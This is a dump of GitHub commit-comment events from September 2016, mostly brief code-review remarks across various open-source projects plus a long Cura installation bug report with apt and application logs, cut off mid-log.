{"id":"4546107762","type":"CommitCommentEvent","actor":{"login":"autopear"},"repo":{"name":"rpetrich/Localization"},"payload":{"comment":{"id":18977437,"position":null,"line":null,"path":null,"commit_id":"42f72dfb475712c94923e08083488ed54d1bbcd0","created_at":"2016-09-11T16:34:15Z","updated_at":"2016-09-11T16:34:15Z","body":"The strings are extracted from the program files. You may ask @rpetrich for why he chose such strings.\r\n\r\nMy understanding is, \"Single press and hold\" is \"Press, release, press, hold (without release)\", so there are two presses. My translation in Chinese is \"Press and release, then press and hold\"."}},"created_at":"2016-09-11T16:34:15Z"}
{"id":"4546108895","type":"CommitCommentEvent","actor":{"login":"bsongis"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":18977438,"position":null,"line":null,"path":null,"commit_id":"0d12832d303042dbb84e10f57f98c58e45588d8c","created_at":"2016-09-11T16:35:06Z","updated_at":"2016-09-11T16:35:06Z","body":":+1 I was tired ..."}},"created_at":"2016-09-11T16:35:06Z"}
{"id":"4546109815","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":18977440,"position":76,"line":404,"path":"nodejs/dist/uws.js","commit_id":"56abcced914497e1fc4fe24304b86564bc4aca8d","created_at":"2016-09-11T16:35:41Z","updated_at":"2016-09-11T16:35:41Z","body":"Dude ArrayBuffer / TypedArrays are WAY faster than Node.js Buffers. I can construct a new Uint8Array from the ArrayBuffer with 930 echoes/ms, virtually having no overhead whatsoever."}},"created_at":"2016-09-11T16:35:41Z"}
{"id":"4546111537","type":"CommitCommentEvent","actor":{"login":"raj454raj"},"repo":{"name":"web2py/web2py"},"payload":{"comment":{"id":18977442,"position":5,"line":217,"path":"scripts/setup-web2py-nginx-uwsgi-ubuntu.sh","commit_id":"e87378b07f143a9d90e383430afe1309094ada38","created_at":"2016-09-11T16:36:52Z","updated_at":"2016-09-11T16:36:52Z","body":"systemctl does not work in Ubuntu 14.04"}},"created_at":"2016-09-11T16:36:52Z"}
{"id":"4546113748","type":"CommitCommentEvent","actor":{"login":"na-Itms"},"repo":{"name":"0ad/0ad"},"payload":{"comment":{"id":18977445,"position":null,"line":null,"path":null,"commit_id":"2ebf460d2e4b81c3282db0857f2263a04e0ef24f","created_at":"2016-09-11T16:38:22Z","updated_at":"2016-09-11T16:38:22Z","body":"TODO: update mongoose..."}},"created_at":"2016-09-11T16:38:22Z"}
{"id":"4546114607","type":"CommitCommentEvent","actor":{"login":"delphiactual"},"repo":{"name":"matteatsmochi/DestinyWeaponSwap"},"payload":{"comment":{"id":18977447,"position":5,"line":232,"path":"DestinyWeaponSwap/DestinyWeaponSwap.Designer.vb","commit_id":"2f806108a968aa6d5e231918cf0cdc715c256eea","created_at":"2016-09-11T16:38:57Z","updated_at":"2016-09-11T16:38:57Z","body":"Could just be \"\""}},"created_at":"2016-09-11T16:38:57Z"}
{"id":"4546115019","type":"CommitCommentEvent","actor":{"login":"delphiactual"},"repo":{"name":"matteatsmochi/DestinyWeaponSwap"},"payload":{"comment":{"id":18977449,"position":14,"line":244,"path":"DestinyWeaponSwap/DestinyWeaponSwap.Designer.vb","commit_id":"2f806108a968aa6d5e231918cf0cdc715c256eea","created_at":"2016-09-11T16:39:13Z","updated_at":"2016-09-11T16:39:13Z","body":"Could just be \"\""}},"created_at":"2016-09-11T16:39:13Z"}
{"id":"4546115122","type":"CommitCommentEvent","actor":{"login":"delphiactual"},"repo":{"name":"matteatsmochi/DestinyWeaponSwap"},"payload":{"comment":{"id":18977450,"position":23,"line":256,"path":"DestinyWeaponSwap/DestinyWeaponSwap.Designer.vb","commit_id":"2f806108a968aa6d5e231918cf0cdc715c256eea","created_at":"2016-09-11T16:39:19Z","updated_at":"2016-09-11T16:39:19Z","body":"Could just be \"\""}},"created_at":"2016-09-11T16:39:19Z"}
{"id":"4546116143","type":"CommitCommentEvent","actor":{"login":"delphiactual"},"repo":{"name":"matteatsmochi/DestinyWeaponSwap"},"payload":{"comment":{"id":18977451,"position":null,"line":null,"path":null,"commit_id":"2f806108a968aa6d5e231918cf0cdc715c256eea","created_at":"2016-09-11T16:40:08Z","updated_at":"2016-09-11T16:40:08Z","body":"it's actually funny to me because null means nothing so even \"\" is something but better than \"Null\""}},"created_at":"2016-09-11T16:40:08Z"}
{"id":"4546116248","type":"CommitCommentEvent","actor":{"login":"Guite"},"repo":{"name":"zikula-ev/Formicula"},"payload":{"comment":{"id":18977452,"position":null,"line":null,"path":null,"commit_id":"4ab908cc232c75d61b6aa8cd7c0ba8ecd45522c6","created_at":"2016-09-11T16:40:12Z","updated_at":"2016-09-11T16:40:12Z","body":"@marcpare4 you need to provide all required arguments.\r\n\r\nThis works:\r\nhttp://notabenebaroque.ca/index.php?module=Formicula&type=user&func=main&form=0\r\n"}},"created_at":"2016-09-11T16:40:12Z"}
{"id":"4546116295","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18977453,"position":32,"line":14,"path":"ALGORYTHMS/task2/randoms_list.h","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T16:40:13Z","updated_at":"2016-09-11T16:40:13Z","body":"ИМХО\r\nСтоит либо удалить совсем, либо поменять `std::cout` на `debug`."}},"created_at":"2016-09-11T16:40:13Z"}
{"id":"4546116384","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18977454,"position":35,"line":16,"path":"ALGORYTHMS/task2/randoms_list.h","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T16:40:16Z","updated_at":"2016-09-11T16:40:16Z","body":"Как же ты будешь проверять на пустых списках?"}},"created_at":"2016-09-11T16:40:16Z"}
{"id":"4546116488","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18977455,"position":20,"line":46,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T16:40:21Z","updated_at":"2016-09-11T16:40:21Z","body":"Новый хвост из-за такой инициализации будет ссылаться сам на себя.\r\nИ потому тебе приходится после цикла править `first_element->next()`.\r\nИМХО, проще здесь инициализировать `nullptr`ом."}},"created_at":"2016-09-11T16:40:21Z"}
{"id":"4546116683","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18977456,"position":85,"line":111,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T16:40:30Z","updated_at":"2016-09-11T16:40:30Z","body":"Тут UB, если в `reversed_init_list` меньше элементов, чем в `init_list`.\r\nНужно перед циклом проверить что вектора имеют одинаковый размер.\r\n"}},"created_at":"2016-09-11T16:40:30Z"}
{"id":"4546116848","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18977457,"position":87,"line":113,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T16:40:36Z","updated_at":"2016-09-11T16:40:36Z","body":"Либо уж сделай возвращаемое значение `void`, либо не нужно тут кидать исключений.\r\nИМХО, лучше возвращать `bool`, а не кидать исключения. Так как нет ничего исключительного в передаче некорректных данных в функцию, которая собственно проверяет эти данные на корректность."}},"created_at":"2016-09-11T16:40:36Z"}
{"id":"4546117202","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18977458,"position":16,"line":30,"path":"youtube_dl/extractor/tube8.py","commit_id":"6599c72527ca8434589c010c48164494ab4c2469","created_at":"2016-09-11T16:40:51Z","updated_at":"2016-09-11T16:40:51Z","body":"Debugging codes?"}},"created_at":"2016-09-11T16:40:51Z"}
{"id":"4546117506","type":"CommitCommentEvent","actor":{"login":"sergey-v-galtsev"},"repo":{"name":"aashikhmin82/test"},"payload":{"comment":{"id":18977459,"position":112,"line":128,"path":"ALGORYTHMS/task2/reverse_list.cpp","commit_id":"b24c17e5cbb96c9781037ce68d51b0c693165344","created_at":"2016-09-11T16:41:01Z","updated_at":"2016-09-11T16:41:01Z","body":"А проверить на пустом списке?"}},"created_at":"2016-09-11T16:41:01Z"}
{"id":"4546118684","type":"CommitCommentEvent","actor":{"login":"jvillagarcia"},"repo":{"name":"jvillagarcia/hello-world"},"payload":{"comment":{"id":18977460,"position":null,"line":null,"path":null,"commit_id":"9d5c1a6a9e2b88f3ebe9826d5b27e9255af39023","created_at":"2016-09-11T16:41:47Z","updated_at":"2016-09-11T16:41:47Z","body":"Comment 11/09"}},"created_at":"2016-09-11T16:41:47Z"}
{"id":"4546123358","type":"CommitCommentEvent","actor":{"login":"autopear"},"repo":{"name":"rpetrich/Localization"},"payload":{"comment":{"id":18977464,"position":null,"line":null,"path":null,"commit_id":"42f72dfb475712c94923e08083488ed54d1bbcd0","created_at":"2016-09-11T16:44:58Z","updated_at":"2016-09-11T16:44:58Z","body":"@rpetrich Btw, the current beta (1.9.11~beta2) has a bug that selecting an action again won't remove it from the assignment list, the list shows an empty action."}},"created_at":"2016-09-11T16:44:58Z"}
{"id":"4546123512","type":"CommitCommentEvent","actor":{"login":"PabstMirror"},"repo":{"name":"acemod/ACE3"},"payload":{"comment":{"id":18977465,"position":40,"line":40,"path":"addons/cookoff/functions/fnc_detonateAmmunition.sqf","commit_id":"b63cf25ff4530ccb6b18e3d7a6300e0bab389387","created_at":"2016-09-11T16:45:03Z","updated_at":"2016-09-11T16:45:03Z","body":"A bullet exploding won't do much without the barrel.\r\nVery little of the pressure will accelerate the bullet, which will just tumble in the air.\r\nYou might get some scratches, but we should make sure this is not lethal.\r\nMaybe we could replace all ammo with `ace_frag_tiny_hd`"}},"created_at":"2016-09-11T16:45:03Z"}
{"id":"4546126705","type":"CommitCommentEvent","actor":{"login":"andy5995"},"repo":{"name":"0ad/0ad"},"payload":{"comment":{"id":18977468,"position":null,"line":null,"path":null,"commit_id":"2ebf460d2e4b81c3282db0857f2263a04e0ef24f","created_at":"2016-09-11T16:47:08Z","updated_at":"2016-09-11T16:47:08Z","body":"An svn patch for that TODO\r\n[2ebf460.patch.zip](https://github.com/0ad/0ad/files/466110/2ebf460.patch.zip)\r\n"}},"created_at":"2016-09-11T16:47:08Z"}
{"id":"4546127251","type":"CommitCommentEvent","actor":{"login":"Byron"},"repo":{"name":"gitpython-developers/GitPython"},"payload":{"comment":{"id":18977469,"position":22,"line":113,"path":"git/test/test_repo.py","commit_id":"2ba897b12024fd20681b7c2f1b40bdbbccd5df59","created_at":"2016-09-11T16:47:27Z","updated_at":"2016-09-11T16:47:27Z","body":"Two tests ? I count only one, which was indeed intentional. It was failing until the`__getstate__` and `__setstate__` methods had been implemented."}},"created_at":"2016-09-11T16:47:27Z"}
{"id":"4546128000","type":"CommitCommentEvent","actor":{"login":"dstftw"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18977472,"position":16,"line":30,"path":"youtube_dl/extractor/tube8.py","commit_id":"6599c72527ca8434589c010c48164494ab4c2469","created_at":"2016-09-11T16:47:55Z","updated_at":"2016-09-11T16:47:55Z","body":"Fixed."}},"created_at":"2016-09-11T16:47:55Z"}
{"id":"4546128808","type":"CommitCommentEvent","actor":{"login":"liubiantao"},"repo":{"name":"2remote/yaopai-mobile"},"payload":{"comment":{"id":18977473,"position":37,"line":33,"path":"app/components/WorkPage/PriceTag.js","commit_id":"c589624bb48ead90dddf23f92a3fdd09b0002365","created_at":"2016-09-11T16:48:27Z","updated_at":"2016-09-11T16:48:27Z","body":"@zaxlct Why? Could you plz explain it more clearly?"}},"created_at":"2016-09-11T16:48:27Z"}
{"id":"4546129639","type":"CommitCommentEvent","actor":{"login":"z3ntu"},"repo":{"name":"chriswininger/Derp-Learning"},"payload":{"comment":{"id":18977475,"position":null,"line":null,"path":null,"commit_id":"7e6d1a5033885491d33de30c496b2e0fc6d4a1d4","created_at":"2016-09-11T16:48:59Z","updated_at":"2016-09-11T16:48:59Z","body":"Can you please change the description of the repository to what it is? Thanks :)"}},"created_at":"2016-09-11T16:48:59Z"}
{"id":"4546130611","type":"CommitCommentEvent","actor":{"login":"matteatsmochi"},"repo":{"name":"matteatsmochi/DestinyWeaponSwap"},"payload":{"comment":{"id":18977477,"position":null,"line":null,"path":null,"commit_id":"2f806108a968aa6d5e231918cf0cdc715c256eea","created_at":"2016-09-11T16:49:41Z","updated_at":"2016-09-11T16:49:41Z","body":"Haha, it's true. I went with null as the box is empty and that's what I associate it with in after effects."}},"created_at":"2016-09-11T16:49:41Z"}
{"id":"4546130630","type":"CommitCommentEvent","actor":{"login":"yan12125"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":18977478,"position":16,"line":30,"path":"youtube_dl/extractor/tube8.py","commit_id":"6599c72527ca8434589c010c48164494ab4c2469","created_at":"2016-09-11T16:49:41Z","updated_at":"2016-09-11T16:49:41Z","body":"Thanks!"}},"created_at":"2016-09-11T16:49:41Z"}
{"id":"4546131826","type":"CommitCommentEvent","actor":{"login":"marcpare4"},"repo":{"name":"zikula-ev/Formicula"},"payload":{"comment":{"id":18977480,"position":null,"line":null,"path":null,"commit_id":"4ab908cc232c75d61b6aa8cd7c0ba8ecd45522c6","created_at":"2016-09-11T16:50:27Z","updated_at":"2016-09-11T16:50:27Z","body":"Ah, got it. Thanks for the help.\r\nMarc"}},"created_at":"2016-09-11T16:50:27Z"}
{"id":"4546133448","type":"CommitCommentEvent","actor":{"login":"BobRyan530"},"repo":{"name":"thopiekar/Cura"},"payload":{"comment":{"id":18977482,"position":null,"line":null,"path":null,"commit_id":"02fd71fe58154bb46d5deba413b26c8c385e45ab","created_at":"2016-09-11T16:51:30Z","updated_at":"2016-09-11T16:51:30Z","body":"After removing cura, cura-engine, libarcus then apt autoremove I'm still encountering the same problem.\r\n\r\nh36sa@bowser /usr/share $ sudo apt install cura\r\nReading package lists... Done\r\nBuilding dependency tree       \r\nReading state information... Done\r\nThe following additional packages will be installed:\r\n  cura-engine libarcus python3-arcus python3-decorator python3-scipy python3-uranium qml-module-qt-labs-folderlistmodel qml-module-qt-labs-settings qml-module-qtqml-models2\r\nSuggested packages:\r\n  python-scipy-doc\r\nThe following NEW packages will be installed:\r\n  cura cura-engine libarcus python3-arcus python3-decorator python3-scipy python3-uranium qml-module-qt-labs-folderlistmodel qml-module-qt-labs-settings qml-module-qtqml-models2\r\n0 upgraded, 10 newly installed, 0 to remove and 0 not upgraded.\r\nNeed to get 20.2 MB of archives.\r\nAfter this operation, 79.7 MB of additional disk space will be used.\r\nDo you want to continue? [Y/n] \r\nGet:1 http://mirror.htnshost.com/ubuntu xenial/universe amd64 python3-decorator all 4.0.6-1 [9,388 B]\r\nGet:2 http://mirror.htnshost.com/ubuntu xenial/universe amd64 python3-scipy amd64 0.17.0-1 [8,327 kB]\r\nGet:3 http://ppa.launchpad.net/thopiekar/cura/ubuntu xenial/main amd64 libarcus amd64 1:2.3.0-0~201609102236~rev110~pkg25~ubuntu16.04.1 [328 kB]\r\nGet:4 http://mirror.htnshost.com/ubuntu xenial/main amd64 qml-module-qtqml-models2 amd64 5.5.1-2ubuntu6 [16.8 kB]\r\nGet:5 http://mirror.htnshost.com/ubuntu xenial/main amd64 qml-module-qt-labs-folderlistmodel amd64 5.5.1-2ubuntu6 [30.9 kB]\r\nGet:6 http://mirror.htnshost.com/ubuntu xenial/main amd64 qml-module-qt-labs-settings amd64 5.5.1-2ubuntu6 [20.1 kB]\r\nGet:7 http://ppa.launchpad.net/thopiekar/cura/ubuntu xenial/main amd64 cura-engine amd64 1:2.3.0-0~201609102031~rev1286~pkg25~ubuntu16.04.1 [419 kB]\r\nGet:8 http://ppa.launchpad.net/thopiekar/cura/ubuntu xenial/main amd64 python3-arcus amd64 1:2.3.0-0~201609102236~rev110~pkg25~ubuntu16.04.1 [17.6 kB]\r\nGet:9 http://ppa.launchpad.net/thopiekar/cura/ubuntu xenial/main amd64 python3-uranium all 1:2.3.0-0-0~201609102247~rev1685~pkg26~ubuntu16.04.1 [197 kB]\r\nGet:10 http://ppa.launchpad.net/thopiekar/cura/ubuntu xenial/main amd64 cura all 1:2.3.0-0~201609102032~rev1215~pkg25~ubuntu16.04.1 [10.8 MB]\r\nFetched 20.2 MB in 7s (2,658 kB/s)                                                                                                                                                                                                                                                                                           \r\nSelecting previously unselected package libarcus:amd64.\r\n(Reading database ... 403398 files and directories currently installed.)\r\nPreparing to unpack .../libarcus_1%3a2.3.0-0~201609102236~rev110~pkg25~ubuntu16.04.1_amd64.deb ...\r\nUnpacking libarcus:amd64 (1:2.3.0-0~201609102236~rev110~pkg25~ubuntu16.04.1) ...\r\nSelecting previously unselected package cura-engine.\r\nPreparing to unpack .../cura-engine_1%3a2.3.0-0~201609102031~rev1286~pkg25~ubuntu16.04.1_amd64.deb ...\r\nUnpacking cura-engine (1:2.3.0-0~201609102031~rev1286~pkg25~ubuntu16.04.1) ...\r\nSelecting previously unselected package python3-arcus.\r\nPreparing to unpack .../python3-arcus_1%3a2.3.0-0~201609102236~rev110~pkg25~ubuntu16.04.1_amd64.deb ...\r\nUnpacking python3-arcus (1:2.3.0-0~201609102236~rev110~pkg25~ubuntu16.04.1) ...\r\nSelecting previously unselected package python3-decorator.\r\nPreparing to unpack .../python3-decorator_4.0.6-1_all.deb ...\r\nUnpacking python3-decorator (4.0.6-1) ...\r\nSelecting previously unselected package python3-scipy.\r\nPreparing to unpack .../python3-scipy_0.17.0-1_amd64.deb ...\r\nUnpacking python3-scipy (0.17.0-1) ...\r\nSelecting previously unselected package qml-module-qtqml-models2:amd64.\r\nPreparing to unpack .../qml-module-qtqml-models2_5.5.1-2ubuntu6_amd64.deb ...\r\nUnpacking qml-module-qtqml-models2:amd64 (5.5.1-2ubuntu6) ...\r\nSelecting previously unselected package python3-uranium.\r\nPreparing to unpack .../python3-uranium_1%3a2.3.0-0-0~201609102247~rev1685~pkg26~ubuntu16.04.1_all.deb ...\r\nUnpacking python3-uranium (1:2.3.0-0-0~201609102247~rev1685~pkg26~ubuntu16.04.1) ...\r\nSelecting previously unselected package qml-module-qt-labs-folderlistmodel:amd64.\r\nPreparing to unpack .../qml-module-qt-labs-folderlistmodel_5.5.1-2ubuntu6_amd64.deb ...\r\nUnpacking qml-module-qt-labs-folderlistmodel:amd64 (5.5.1-2ubuntu6) ...\r\nSelecting previously unselected package qml-module-qt-labs-settings:amd64.\r\nPreparing to unpack .../qml-module-qt-labs-settings_5.5.1-2ubuntu6_amd64.deb ...\r\nUnpacking qml-module-qt-labs-settings:amd64 (5.5.1-2ubuntu6) ...\r\nSelecting previously unselected package cura.\r\nPreparing to unpack .../cura_1%3a2.3.0-0~201609102032~rev1215~pkg25~ubuntu16.04.1_all.deb ...\r\nUnpacking cura (1:2.3.0-0~201609102032~rev1215~pkg25~ubuntu16.04.1) ...\r\nProcessing triggers for libc-bin (2.23-0ubuntu3) ...\r\nProcessing triggers for shared-mime-info (1.5-2ubuntu0.1) ...\r\nProcessing triggers for gnome-menus (3.13.3-6ubuntu3.1) ...\r\nProcessing triggers for desktop-file-utils (0.22-1ubuntu5) ...\r\nProcessing triggers for mime-support (3.59ubuntu1) ...\r\nSetting up libarcus:amd64 (1:2.3.0-0~201609102236~rev110~pkg25~ubuntu16.04.1) ...\r\nSetting up cura-engine (1:2.3.0-0~201609102031~rev1286~pkg25~ubuntu16.04.1) ...\r\nSetting up python3-arcus (1:2.3.0-0~201609102236~rev110~pkg25~ubuntu16.04.1) ...\r\nSetting up python3-decorator (4.0.6-1) ...\r\nSetting up python3-scipy (0.17.0-1) ...\r\nSetting up qml-module-qtqml-models2:amd64 (5.5.1-2ubuntu6) ...\r\nSetting up python3-uranium (1:2.3.0-0-0~201609102247~rev1685~pkg26~ubuntu16.04.1) ...\r\nSetting up qml-module-qt-labs-folderlistmodel:amd64 (5.5.1-2ubuntu6) ...\r\nSetting up qml-module-qt-labs-settings:amd64 (5.5.1-2ubuntu6) ...\r\nSetting up cura (1:2.3.0-0~201609102032~rev1215~pkg25~ubuntu16.04.1) ...\r\nProcessing triggers for libc-bin (2.23-0ubuntu3) ...\r\nh36sa@bowser /usr/share $ cura\r\n2016-09-11 09:49:12,272 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin ConsoleLogger\r\n2016-09-11 09:49:12,283 - INFO - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (__init__ [40]): Found CuraEngine at: /usr/bin/CuraEngine\r\n2016-09-11 09:49:12,284 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin CuraEngineBackend\r\n2016-09-11 09:49:12,291 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin MirrorTool\r\n2016-09-11 09:49:12,304 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin RotateTool\r\n2016-09-11 09:49:12,310 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin CameraTool\r\n2016-09-11 09:49:12,321 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin ScaleTool\r\n2016-09-11 09:49:12,327 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin TranslateTool\r\n2016-09-11 09:49:12,331 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin SelectionTool\r\n2016-09-11 09:49:12,336 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin LocalFileOutputDevice\r\n2016-09-11 09:49:12,336 - WARNING - .../UM/PluginRegistry.py (loadPlugin [63]): Plugin ConsoleLogger was already loaded\r\n2016-09-11 09:49:12,339 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin OBJWriter\r\n2016-09-11 09:49:12,342 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin STLWriter\r\n2016-09-11 09:49:12,355 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin 3MFWriter\r\n2016-09-11 09:49:12,359 - WARNING - /usr/lib/uranium/plugins/FileHandlers/STLReader/STLReader.py (<module> [5]): Could not find numpy-stl, falling back to slower code.\r\n2016-09-11 09:49:12,361 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin STLReader\r\n2016-09-11 09:49:12,365 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin OBJReader\r\n2016-09-11 09:49:12,367 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin FileLogger\r\n2016-09-11 09:49:12,370 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin WireframeView\r\n2016-09-11 09:49:12,373 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin SimpleView\r\n2016-09-11 09:49:12,374 - WARNING - .../UM/PluginRegistry.py (loadPlugin [63]): Plugin CuraEngineBackend was already loaded\r\n2016-09-11 09:49:12,376 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin LegacyProfileReader\r\n2016-09-11 09:49:12,378 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin GCodeWriter\r\n2016-09-11 09:49:12,410 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin SliceInfoPlugin\r\n2016-09-11 09:49:12,414 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin RemovableDriveOutputDevice\r\n2016-09-11 09:49:12,417 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin ChangeLogPlugin\r\n2016-09-11 09:49:12,420 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin MachineSettingsAction\r\n2016-09-11 09:49:12,425 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin PerObjectSettingsTool\r\n2016-09-11 09:49:12,430 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin ImageReader\r\n2016-09-11 09:49:12,433 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin CuraProfileWriter\r\n2016-09-11 09:49:12,443 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin USBPrinting\r\n2016-09-11 09:49:12,448 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin GCodeProfileReader\r\n2016-09-11 09:49:12,453 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin LayerView\r\n2016-09-11 09:49:12,458 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin SolidView\r\n2016-09-11 09:49:12,462 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin CuraProfileReader\r\n2016-09-11 09:49:12,467 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin VersionUpgrade21to22\r\n2016-09-11 09:49:12,470 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin AutoSave\r\n2016-09-11 09:49:12,473 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin XRayView\r\n2016-09-11 09:49:12,479 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin UltimakerMachineActions\r\n2016-09-11 09:49:12,495 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin XmlMaterialProfile\r\n2016-09-11 09:49:12,498 - INFO - .../UM/PluginRegistry.py (loadPlugin [63]): Loaded plugin 3MFReader\r\n2016-09-11 09:49:12,499 - INFO - .../UM/Qt/QtApplication.py (__init__ [39]): Command line arguments: {'external-backend': False, 'debug-mode': False, 'file': [], 'disable-textures': False}\r\n2016-09-11 09:49:12,502 - INFO - .../UM/VersionUpgradeManager.py (upgrade [62]): Looking for old configuration files to upgrade.\r\n2016-09-11 09:49:12,613 - DEBUG - .../UM/Backend/Backend.py (_logSocketState [165]): Socket state changed to Listening\r\n2016-09-11 09:49:12,619 - INFO - .../UM/Backend/Backend.py (startEngine [55]): Started engine process: /usr/bin/CuraEngine\r\n2016-09-11 09:49:12,619 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] Calling engine with: ['/usr/bin/CuraEngine', 'connect', '127.0.0.1:49674', '-j', '/usr/share/cura/resources/definitions/fdmprinter.def.json', '']\r\n2016-09-11 09:49:12,620 - DEBUG - .../UM/Backend/Backend.py (_backendLog [88]): [Backend] /usr/bin/CuraEngine: error while loading shared libraries: libArcus.so.2: cannot open shared object file: No such file or directory\r\n2016-09-11 09:49:12,650 - DEBUG - /usr/lib/cura/plugins/CuraEngineBackend/CuraEngineBackend.py (_onBackendQuit [412]): Backend quit with return code 127. Resetting process and socket.\r\n2016-09-11 09:49:12,650 - DEBUG - .../UM/Backend/Backend.py (_createSocket [206]): Previous socket existed. Closing that first.\r\n2016-09-11 09:49:12,714 - DEBUG - /usr/lib/cura/plugins/MachineSettingsAction/MachineSettingsAction.py (_onContainerAdded [40]): Not attaching MachineSettingsAction to ultimaker2_extended_plus; Machines that use variants are not supported\r\n2016-09-11 09:49:12,877 - DEBUG - /usr/lib/cura/plugins/MachineSettingsAction/MachineSettingsAction.py (_onContainerAdded [40]): Not attaching MachineSettingsAction to ultimaker_original_dual; Multi-extrusion printers are not supported\r\n2016-09-11 09:49:13,648 - DEBUG - /usr/lib/cura/plugins/MachineSettingsAction/MachineSettingsAction.py (_onContainerAdded [40]): Not attaching MachineSettingsAction to ultimaker2_plus; Machines that use variants are not supported\r\n2016-09-11 09:49:21,600 - ERROR - .../UM/Logger.py (logException [53]): Exception: Could not deserialize container Monoprice Select Mini_current_settings\r\n2016-09-11 09:49:21,601 - ERROR - .../UM/Logger.py (logException [53]): Traceback (most recent call last):\r\n2016-09-11 09:49:21,601 - ERROR - .../UM/Logger.py (logException [53]):   File \"/usr/lib/python3/dist-packages/UM/Settings/ContainerRegistry.py\", line 208, in load\r\n2016-09-11 09:49:21,601 - ERROR - .../UM/Logger.py (logException [53]):     new_container.deserialize(f.read())\r\n2016-09-11 09:49:21,601 - ERROR - .../UM/Logger.py (logException [53]):   File \"/usr/lib/python3/dist-packages/UM/Settings/InstanceContainer.py\", line 304, in deserialize\r\n2016-09-11 09:49:21,601 - ERROR - .../UM/Logger.py (logException [53]):     raise DefinitionNotFoundError(\"Could not find definition {0} required for instance {1}\".format(definition_id, self._id))\r\n2016-09-11 09:49:21,601 - ERROR - .../UM/Logger.py (logException [53]): UM.Settings.InstanceContainer.DefinitionNotFoundError: Could not find definition mp_select_mini required for instance Monoprice Select Mini_current_settings\r\n2016-09-11 09:49:21,609 - ERROR - .../UM/Logger.py (logException [53]): Exception: Could not deserialize container Monoprice Select Mini\r\n2016-09-11 09:49:21,609 - ERROR - .../UM/Logger.py (logException [53]): Traceback (most recent call last):\r\n2016-09-11 09:49:21,609 - ERROR - .../UM/Logger.py (logException [53]):   File \"/usr/lib/python3/dist-packages/UM/Settings/ContainerRegistry.py\", line 208, in load\r\n2016-09-11 09:49:21,610 - ERROR - .../UM/Logger.py (logException [53]):     new_container.deserialize(f.read())\r\n2016-09-11 09:49:21,610 - ERROR - .../UM/Logger.py (logException [53]):   File \"/usr/lib/python3/dist-packages/UM/Settings/ContainerStack.py\", line 253, in deserialize\r\n2016-09-11 09:49:21,610 - ERROR - .../UM/Logger.py (logException [53]):     raise Exception(\"When trying to deserialize, we received an unknown ID (%s) for container\" % container_id)\r\n2016-09-11 09:49:21,610 - ERROR - .../UM/Logger.py 